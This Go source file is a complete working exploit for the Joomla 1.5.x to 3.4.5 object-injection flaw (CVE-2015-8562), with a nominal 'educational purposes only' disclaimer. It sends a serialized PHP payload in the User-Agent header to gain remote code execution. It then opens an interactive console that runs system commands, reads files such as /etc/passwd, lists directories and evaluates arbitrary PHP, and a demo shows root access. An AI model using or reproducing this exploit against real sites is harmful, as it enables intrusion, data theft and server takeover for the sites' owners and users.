package main /* ************************************************************************** * Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit * Exploit Author: Khashayar Fereidani ( http://fereidani.com ) * Version: 1.5.x to 3.4.5 * CVE : CVE-2015-8562 ************************************************************************** * THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE * IS ON YOUR OWN RESPONSIBILITY ************************************************************************** * How to run : (you need golang compiler from golang.org) * go run exploit.go http://target/path * or * go build exploit.go * ./exploit http://target/path ************************************************************************** * DEMO : $ ./exploit 192.168.1.113/joomla ############################################### # Joomla Remote Command Execution 0day Exploit # Exploited by: Khashayar Fereidani # http://fereidani.com # Vulnerable Versions: 1.5.x to 3.4.5 ############################################### Attacking to http://FILTERED.TLD/joomla/ Target is vulnerable ! # Command Line Documentation : read FILEPATH read file from FILEPATH dir DIRPATH list directory in DIRPATH exec COMMAND execute system command eval phpcode evaluate PHP Code help display this help exit close exploit console [*] Examples: read /etc/passwd dir /etc/ exec ls -lah eval include('/etc/passwd') root@joomla:$ exec uname -a Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux root@joomla:$ */ import ( "fmt" "net/http" "regexp" "os" "io/ioutil" "bytes" "net/http/cookiejar" "net/url" "bufio" "strings" ) var target string; var helpString=`# Command Line Documentation : read FILEPATH read file from FILEPATH dir DIRPATH list directory in DIRPATH exec COMMAND execute system command eval phpcode evaluate PHP Code help display this help exit close exploit console [*] Examples: read /etc/passwd dir /etc/ exec ls -lah eval include('/etc/passwd') ` var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://") var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)") var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)") var newLine=regexp.MustCompile("[\\n\\r]") var client *http.Client func newRequest(command string) *http.Request{ values:=url.Values{} values.Set("1","echo('iMH3r3=');"+command+";") req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode())) if err!=nil{ panic(err) } req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd") req.Header.Add("Content-Type", "application/x-www-form-urlencoded") return req } func escape(str string) string{ return strings.Replace(str,"'","\\'",-1) } func runCommand(command string){ res,err:=client.Do(newRequest(command)) if err!=nil{ fmt.Println(err.Error()) }else{ defer res.Body.Close() resBytes,err:=ioutil.ReadAll(res.Body) str:=string(resBytes) if err!=nil{ fmt.Println(err) } match:=resultRegex.FindStringSubmatch(str) if len(match)>0{ fmt.Print(match[0][7:]) } } } func confirm() bool{ res,err:=client.Do(newRequest("")) if err!=nil{ fmt.Println(err) return false }else{ if res.StatusCode==500{ fmt.Println("Patched PHP Version :( !") return false } defer res.Body.Close() resBytes,err:=ioutil.ReadAll(res.Body) str:=string(resBytes) if err!=nil{ fmt.Println(err) } match:=resultRegex.FindStringSubmatch(str) if len(match)>0{ return true }else{ return false } } } func main(){ fmt.Print(`############################################### # Joomla Remote Command Execution 0day Exploit # Exploited by: Khashayar Fereidani # http://fereidani.com # Vulnerable Versions: 1.5.0 to 3.4.5 ############################################### `) options := cookiejar.Options{} jar, err := cookiejar.New(&options) if err != nil { panic(err) } client = &http.Client{ Jar:jar, } if len(os.Args)<2{ fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/") return } target=os.Args[1] if(!validHttpUrl.MatchString(target)){ target="http://"+target } if string(target[len(target)-1])!="/"{ target+="/" } fmt.Println("Attacking to ",target) res,err:=client.Do(newRequest("")) if err!=nil{ fmt.Println("Request Error:",err) return } ioutil.ReadAll(res.Body) res.Body.Close() if confirm(){ fmt.Println("Target is vulnerable !") //runCommand("system('ls -la')") stdinreader := bufio.NewReader(os.Stdin) fmt.Println(helpString) for { var line string fmt.Print("root@joomla:$ ") line,_=stdinreader.ReadString('\n') line=newLine.ReplaceAllString(line,"") match:=cmdRegex.FindStringSubmatch(line) if len(match)<3 { if (line=="exit"){ return } if !(line=="help"){ fmt.Println("Wrong input !") } fmt.Println(helpString) }else{ cmd:=match[1] input:=escape(match[2]) switch cmd { case "exec": runCommand("system('"+input+"')") case "read": runCommand("readfile('"+input+"')") case "dir": runCommand("$a=scandir('"+input+"');foreach($a as $v){echo $v.\"\\n\";}") case "eval": runCommand(match[2]) } } } }else{ fmt.Println("Target is not vulnerable!") } }